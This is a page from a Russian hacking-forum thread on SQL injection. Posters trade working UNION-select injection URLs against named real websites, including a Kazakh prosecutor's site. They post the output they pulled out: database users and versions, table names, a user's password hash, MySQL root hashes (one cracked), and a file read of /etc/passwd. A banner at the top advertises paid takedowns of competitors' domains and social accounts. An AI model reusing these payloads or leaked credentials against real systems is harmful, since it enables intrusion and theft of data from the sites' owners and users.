Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 502 из 1242

502

Опции темы

Поиск в этой теме

Опции просмотра

#5011

05.03.2008, 13:20

neon_fx

Познающий

Регистрация: 22.02.2008

Сообщений: 74

Провел на форуме:
394753

Репутация: 120

SIdoy
1-www.biomusic.ru Баян
2-mp3.volpi.ru Баян

#5012

05.03.2008, 14:57

truelamer

Участник форума

Регистрация: 06.11.2007

Сообщений: 143

Провел на форуме:
350782

Репутация: 81

http://www.procuror.kz/?iid=-1+union+select+1,concat(user(),char(58),version(), char(58),database()),3,4,5,6,7,8+/*

Сам не ломал и вам не советую, ПРОКУРАТУРА БЛИН! ))))

#5013

05.03.2008, 15:21

neon_fx

Познающий

Регистрация: 22.02.2008

Сообщений: 74

Провел на форуме:
394753

Репутация: 120

http://www.nmmra.org/e-newsletters.php?id=-9+union+select+1,database(),version(),4,5,6,7,8,9, 10,11,user()/*
nmmra@localhost
nmmra
4.1.20

#5014

05.03.2008, 19:45

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Украинская авто газета

autoua.biz

_http://www.autoua.biz/org.php?id=-219+union+select+1,2,3,4,5,6,7,AES_DECRYPT(AES_ENC RYPT(concat(user(),char(58),version(),char(58),dat abase(),0x71),0x71),9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 ,53,54,55,56,57,58/*

autoua@localhost:4.1.18:autoua-market

_http://www.autoua.biz/org.php?id=-219+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_enc rypt(user,0x71),0x71),9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58+from+mysql.user+limit+2,10/*

root:*7DD915644D68E76435D36103BF2BB41D50B337A6

блин 55 столбцов беда,кстати user и password вместе не выводит,что это может быть?

#5015

05.03.2008, 20:09

Saime

Новичок

Регистрация: 27.02.2008

Сообщений: 19

Провел на форуме:
34487

Репутация: 46

steambans.com

Цитата:

http://steambans.com/launchserver.php?id=104739%20and%201=2%20UNION%20A LL%20SELECT%20concat(username,0x3a,password),2,3,4 ,5+from+site_users+where+user_id=2--

D_DK

_DK@steambans.com:72e8f146d1499be218eb6f80f5 30bacd

Последний раз редактировалось Saime; 05.03.2008 в 20:50..

#5016

05.03.2008, 21:00

Lamersha

Новичок

Регистрация: 11.12.2007

Сообщений: 6

Провел на форуме:
162349

Репутация: 14

4.1.22
telgaz_db
telgaz_mysql@212.193.227.34
http://9955599.ru/mo_job.php?mo=sect&Id=-19+UNION+SELECT+1,2/*

#5017

05.03.2008, 22:33

ЛифчиС5СВ

Постоянный

Регистрация: 09.03.2007

Сообщений: 323

Провел на форуме:
1552920

Репутация: 369

http://www.naturamunda.lt

Код:

http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,version(),8,9/*

tarpininka_nm@localhost
5.0.45-community-log

Идем дальше:

Код:

http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,TABLE_NAME,8,9+from+

INFORMATION_SCHEMA.TABLES/*

30 таблиц, среди них:
users_db
personalas
user_privileges и др.

http://sperling-coll.dk

Код:

http://sperling-coll.dk/?filenavn=varer.php4&traeid=-1+union+select+concat_ws(char(58),user(),version(),database())/*

И читаем титул:
Sperling - root@localhost:5.0.27:dbsperlingNY
Думаю, проблем быть не должно =)

А это Вам на съедение:

Код:

http://www.hajosalfred.hu/eng/news.php?id=-1+union+select+1,2,3,4,5+--+

#5018

05.03.2008, 23:03

MegaBits

Участник форума

Регистрация: 30.08.2006

Сообщений: 181

Провел на форуме:
1058786

Репутация: 45

Код:

http://www.milon.ru/index.phtml?id=-6+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

Код:

http://www.milon.ru/index.phtml?id=-6+union+select+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

Хеш рута вытащить не смог.

#5019

05.03.2008, 23:39

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

MegaBits
Вот рут ,но так-же как в моём предъидущем посте не всё понятно
root:032c41e8435273a7 =letmein
Запрос :
_http://www.milon.ru/index.phtml?id=-6+union+select+1,AES_DECRYPT(AES_ENCRYPT(user,0x71 ),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20+from+mysql.user+limit+3,10/*
или user или password вместе нет

#5020

05.03.2008, 23:57

BizzyD

Участник форума

Регистрация: 02.06.2007

Сообщений: 210

Провел на форуме:
1172175

Репутация: 252

Отправить сообщение для BizzyD с помощью ICQ

Код:

http://www.omantribune.com/index.php?page=news&id=99999+union+select+1,2,3,4,5,6,7,8,9/*

omantribune@p3slh024.shr.phx3.secureserver.net

ma ntribune:4.1.22-max-log

Код:

http://www.turkystan.kz/page.php?page_id=14&number_id=99999+union+select+1,2,3,4/*

turkesdb@hosting:turkesdb:4.1.22

Страница 502 из 1242

502

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход